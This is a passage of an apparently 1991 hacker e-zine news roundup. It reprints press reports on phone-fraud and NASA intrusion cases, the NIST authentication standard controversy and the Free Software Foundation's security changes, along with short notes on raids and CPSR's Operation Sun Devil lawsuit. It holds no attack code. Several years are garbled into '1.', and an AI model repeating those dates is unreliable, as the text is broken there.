  2979.      Male Announcer: Dr. Dan Kneer of Arizona State University's School
  2980. of Business is a nationally recognized expert on computer crime.  [who?]  He
  2981. contends that hacking is mushrooming.
  2982.  
  2983.      Dr. Dan: The problem that I see is that these people philosophically
  2984. don't see this as a crime.  For most of them this is an intellectual challenge.
  2985.  
  2986.      Male Announcer: That challenge led Dutch students to break into a United
  2987. States Army Computer during operation desert storm.  And as this Japanese
  2988. documentary shows, it led hackers in a New York City to use payphones to commit
  2989. big time rip-offs.  Now it's important to point out that Donald ______, that
  2990. Arizona State University student, has not yet been charged with any crime and
  2991. if he is charged he is innocent until proven guilty.
  2992.  
  2993.      Female announcer: What is the penalty for hacking?
  2994.  
  2995.      Male Announcer: Just for getting into a system when you're not supposed to
  2996. can be up to a year and a half in prison.   But if there is criminal intent to
  2997. steal, to rip-off that system, the penalty can be as high as 10 years in jail
  2998. and a $150,000.00 fine.
  2999.  
  3000. _______________________________________________________________________________
  3001.  
  3002. Computer Hacker Gets Probation                              September 26, 1991
  3003. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3004. Special Thanks: Flaming Carrot (Pittsburgh Post-Gazette)
  3005.  
  3006.      A Mt. Lebanon woman who was able to make thousands of free long-distance
  3007. telephone calls by breaking into voice mail boxes with a touch tone telephone
  3008. has been placed on 10 years probation.  Last Friday, Common Pleas Judge Robert
  3009. E. Dauer ordered Andrea Gerulis, 20, of Castle Shannon Boulevard to make
  3010. restitution of $4,300 to Magee Womens Hospital and $2,516 to Pittsburgh
  3011. Cellular Telephone Co.
  3012.  
  3013.      Gerulis, a Mt. Lebanon High School graduate, was a computer hacker who
  3014. entered telephone computer systems illegally so that she could make telephone
  3015. calls without paying for the service.  Mt. Lebanon police Detective John L.
  3016. Michalec posed as a computer hacker and spent nine months investigating her
  3017. activities, which were done by dialing codes on a touch-tone telephone.
  3018.  
  3019.      After a non-jury trial in May, Dauer convicted her of two counts of theft
  3020. of services and two counts of unlawful use of computers.  Assistant District
  3021. Attorney Thaddeus A. Dutkowski recommended probation because he didn't want
  3022. Gerulis to go to jail, where she could teach inmates how to commit crimes with
  3023. a telephone.  If she were incarcerated, she would have the largest classroom
  3024. environment she could hope for, Dutkowski said.
  3025.  
  3026.      Dauer agreed that inmates already know too much about committing crimes
  3027. with telephones.  Gerulis told Dauer that she was sorry for what she did, that
  3028. when she started, she was doing it for fun.  She was also ordered to continue
  3029. psychological counseling.
  3030. _______________________________________________________________________________
  3031.  
  3032. More Archaic Government Regulations Proposed
  3033. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3034. Special Thanks: Stainless Steal Provider (New York Times)
  3035.  
  3036.      The federal government said Thursday that it would introduce a standard
  3037. for authenticating electronic data later this summer, but the announcement
  3038. prompted an angry reaction from one of the leading private providers of software
  3039. that protects computer data.
  3040.  
  3041.      The company, RSA Data Security Inc. of Redwood City, Calif., said the
  3042. government had failed to address fears about the possibility of a secret "trap
  3043. door," which would permit intelligence and law-enforcement agencies to look at
  3044. private data.
  3045.  
  3046.     The issue of providing special mechanisms to permit government access to
  3047. private information has caused a growing public debate recently.
  3048.  
  3049.     Earlier this year an anti-terrorism bill introduced in Congress called on
  3050. the computer and telecommunication industries to permit federal agencies to
  3051. look at private data.  But the statement was later dropped from the bill after
  3052. extensive public opposition.
  3053.  
  3054.     Government officials said that it would be possible for technical experts
  3055. to examine the standard when it is released this summer and they could decide
  3056. for themselves whether there were any shortcomings in the design of the
  3057. standard.
  3058.  
  3059.     "It will be openly published and people can inspect it to their heart's
  3060. content," said James H. Burrows, head of the computer systems laboratory at the
  3061. National Institute of Standards and Technology.
  3062.  
  3063.     He added that the new standard was not intended to encrypt computer data,
  3064. and that the government would continue to rely on an earlier technology known
  3065. as the Data Encryption Standard to actually hide information from potential
  3066. electronic eavesdroppers.
  3067.  
  3068.     Burrows said there was a project under way to develop a successor to that
  3069. standard, but that it was years away from completion.
  3070. ______________________________________________________________________________
  3071.  
  3072. Computer Whiz Accused Of Illegal Access and Mischief        September 25, 1991
  3073. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3074. by Peter G. Chronis (The Denver Post Page 1 "NASA vs. Hobbyist")
  3075.  
  3076.      An Aurora computer hobbyist who allegedly used a personal computer and his
  3077. home phone to penetrate NASA computers hacked off Uncle Sam enough to be
  3078. indicted on seven federal counts yesterday.  Richard G. Wittman, 24, the
  3079. alleged "hacker," was accused of two felonies, including gaining unauthorized
  3080. access to NASA computers to alter, damage, or destroy information, and five
  3081. misdemeanor counts of interfering with the government's operation of the
  3082. computers.  Wittman allegedly got into the NASA system on March 7, June 11,
  3083. June 19, June 28, July 25, July 30, and Aug. 2, 1.
  3084.  
  3085.      Bob Pence, FBI chief in Denver, said Wittman used a personal computer in
  3086. his home and gained access to the NASA systems over telephone lines. The
  3087. investigation, which took more than a year, concluded that Wittman accessed the
  3088. NASA computer system and agency computers at the Marshall Space flight Center in
  3089. Huntsville, Alabama, and the Goddard Space Flight Center in Greenbelt,
  3090. Maryland.
  3091.  
  3092.      The NASA computers are linked to a system called Telenet, which allows
  3093. qualified people to access government data bases.  A user name and password
  3094. are required to reach the NASA computers.  Federal sources declined to reveal
  3095. more information because the complex case involves "sensitive material."
  3096.  
  3097.      Wittman, a high-school graduate, apparently hadn't worked in the computer
  3098. industry and held a series of odd jobs.  The felony counts against him each
  3099. carry a possible five-year prison term and $250,000 fine.
  3100. _______________________________________________________________________________
  3101.  
  3102. Security Increases
  3103. ~~~~~~~~~~~~~~~~~
  3104. Special Thanks: Stainless Steal Provider (New York Times)
  3105.  
  3106.      The foundation was started by Richard Stallman, who was awarded a MacArthur
  3107. Foundation fellowship in 1.  While mainstream software companies
  3108. have prohibited users from freely copying their programs, Stallman, who is
  3109. widely respected for developing computer languages and software editing tools,
  3110. has argued that information is not the same as other commodities and should be
  3111. shared without cost.
  3112.  
  3113.      His password has been widely known among network users because he has
  3114. refused to keep it secret.  He is bitter about the changes that have
  3115. accompanied the coming of age of computer networks.
  3116.  
  3117.      Last month, after security was increased at the foundation and many users
  3118. were stripped of their guest privileges, Stallman said he considered giving up
  3119. his quest.
  3120.  
  3121.     In the end, he decided that the cause of creating free software was too
  3122. important to abandon, but he said he feels like a pariah.  "Since I won't agree
  3123. to have a real password, I will only be able to log in on the 'inside'
  3124.  machines,"
  3125. he wrote in an electronic message in response to a reporter's query.
  3126.  
  3127.     "I still feel partly ashamed of participating in this. I've been forced to
  3128. choose between two principles, both of which are so important to me that I
  3129. won't accept the loss of either of them."
  3130.  
  3131.      Idealists like Stallman and Ted Nelson, the author of the cult classic
  3132.  "Computer Lib," hoped that the computer revolution wouldn't be like the
  3133. industrial revolution. This time the wealth -- information -- would be free to
  3134. everyone and instant communication would break down the barriers between rich
  3135. and poor and remake mankind.
  3136.  
  3137.      Marvin Minsky, a computer science professor at MIT, said that for 15
  3138. years, beginning in 1963, researchers at the school lived in a paradise,
  3139. sharing computers and networks before a system of password protection was
  3140. installed. Now that has changed.  "It's sad," he said.
  3141.  
  3142.     "But Richard Stallman is living in a dream world.  He has this view that
  3143. his idea of computer ethics will prevail.  But it's not going to happen this
  3144. year or next."
  3145.  
  3146.     Instead of finding community on computer networks, many users are now
  3147. confronted with virus invasions and information theft, leading to the same
  3148. sense of alienation and fear felt by residents of large cities.
  3149.  
  3150.    "At first I thought this was Marshall McLuhan's global village coming to
  3151. reality," said Neil Harris, a manager at General Electric Information Services
  3152. Co., which sets up computer conferences and sells information to about 200,000
  3153. members around the world.
  3154.  
  3155.    "But it's not that at all. It's a lot of people connecting in hundreds of
  3156. small communities based around highly specific interests."
  3157.  
  3158.     Steven Levy, who has written about the early days of computing at MIT, said
  3159. that the demise of the Free Software Foundation's open door policy was
  3160. inevitable.
  3161.  
  3162.    "When you pass the plate around in church you don't expect people to steal
  3163. from it," he said.  "But sooner or later everyone knows that the plate is
  3164. unguarded, and there are always people who don't care about the church.  The
  3165. question is how far do you go to protect it?  Do you lock the church or do you
  3166. send an armed guard around with the plate?"
  3167. ______________________________________________________________________________
  3168.  
  3169. PWN Quicknotes
  3170. ~~~~~~~~~~~~~
  3171. 1.   On June 12, 1991, Sirhackalot's equipment was confiscated by the Southern
  3172.      Bell and the FBI without any charges being filed.  Neither the FBI nor
  3173.      Southern Bell bothered to explain why they were in his home and taking his
  3174.      personal possessions.  Again neither party could tell Sirhackalot what he
  3175.      supposedly did to bring both agency's to his doorstep.  Also busted were
  3176.      Mr.Doo and The Imortal Phreak.  [Special Thanks: The Marauder (404)]
  3177. _______________________________________________________________________________
  3178.  
  3179. 2.   Bill Cook is no longer an assistant United States Attorney in Chicago.  It
  3180.      is unknown how he left his position.  Basic questions go unanswered. Did
  3181.      he quit or was fired?  If he was fired, we'd like to know exactly why.
  3182. _______________________________________________________________________________
  3183.  
  3184. 3.   Wanted:  Targets of Operation Sun Devil
  3185.  
  3186.      Computer Professionals for Social Responsibility (CPSR) is pursuing a
  3187.      lawsuit against the Secret Service seeking the release of information
  3188.      concerning Operation Sun Devil.  In recently filed court papers, the
  3189.      agency claims that the information cannot be disclosed because, among
  3190.      other reasons, disclosure would violate the privacy of those individuals
  3191.      who are the targets of the investigation.  This argument can be overcome
  3192.      if CPSR obtains signed releases from those individuals.  CPSR is
  3193.      requesting the cooperation of anyone who was the subject of a Sun Devil
  3194.      raid on or about May 7, 1.  We are prepared to enter into an attorney-
  3195.      client relationship with individuals responding to this request, so that
  3196.      confidentiality will be assured.
  3197.  
  3198.      Please respond ASAP to:
  3199.  
  3200.                            David Sobel
  3201.                            CPSR Legal Counsel
  3202.                            (202) 544-9240
  3203.                            dsobel@washofc.cpsr.org
  3204. _______________________________________________________________________________
  3205.  
  3206. 4.   Recently Microsoft discovered it was the victim of trespassing.  A
  3207.      security guard noticed two people playing volleyball on the premises and
  3208.      knew that they did not work for Microsoft.  The officer approached the
  3209.      volleyball players and asked them to leave.  The trespassers left.  Later
  3210.      someone asked the security guard how he knew that the people playing
  3211.      volleyball were not Microsoft employees. He replied, "They had tans."
  3212.      [Special Thanks: Psychotic Surfer]
  3213. _______________________________________________________________________________
  3214.  
  3215.  
  3216. </pre>
  3217. </body>